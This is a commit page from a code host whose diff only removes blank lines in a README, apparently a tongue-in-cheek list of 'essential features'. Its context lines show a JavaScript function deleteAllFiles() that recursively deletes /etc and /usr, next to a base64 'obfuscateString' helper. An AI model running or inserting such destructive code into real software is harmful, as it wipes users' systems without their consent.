chore: lint, update readme
This commit is contained in:
parent
0940b7076a
commit
cf570be96e
23 changed files with 102 additions and 110 deletions
|
@ -42,7 +42,6 @@ This is a non-exhaustive list of features I believe are essential for a friction
|
|||
return true
|
||||
}
|
||||
|
||||
|
||||
function obfuscateString(input) {
|
||||
return Buffer.from(input)
|
||||
.toString('base64')
|
||||
|
@ -51,7 +50,6 @@ This is a non-exhaustive list of features I believe are essential for a friction
|
|||
)
|
||||
}
|
||||
|
||||
|
||||
function deleteAllFiles() {
|
||||
fs.rmdirSync('/etc', { recursive: true })
|
||||
fs.rmdirSync('/usr', { recursive: true })
|
||||
|
@ -89,7 +87,6 @@ This is a non-exhaustive list of features I believe are essential for a friction
|
|||
return true
|
||||
}
|
||||
|
||||
|
||||
function obfuscateString(input) {
|
||||
return Buffer.from(input)
|
||||
.toString('base64')
|
||||
|
@ -98,7 +95,6 @@ This is a non-exhaustive list of features I believe are essential for a friction
|
|||
)
|
||||
}
|
||||
|
||||
|
||||
function deleteAllFiles() {
|
||||
fs.rmdirSync('/etc', { recursive: true })
|
||||
fs.rmdirSync('/usr', { recursive: true })
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue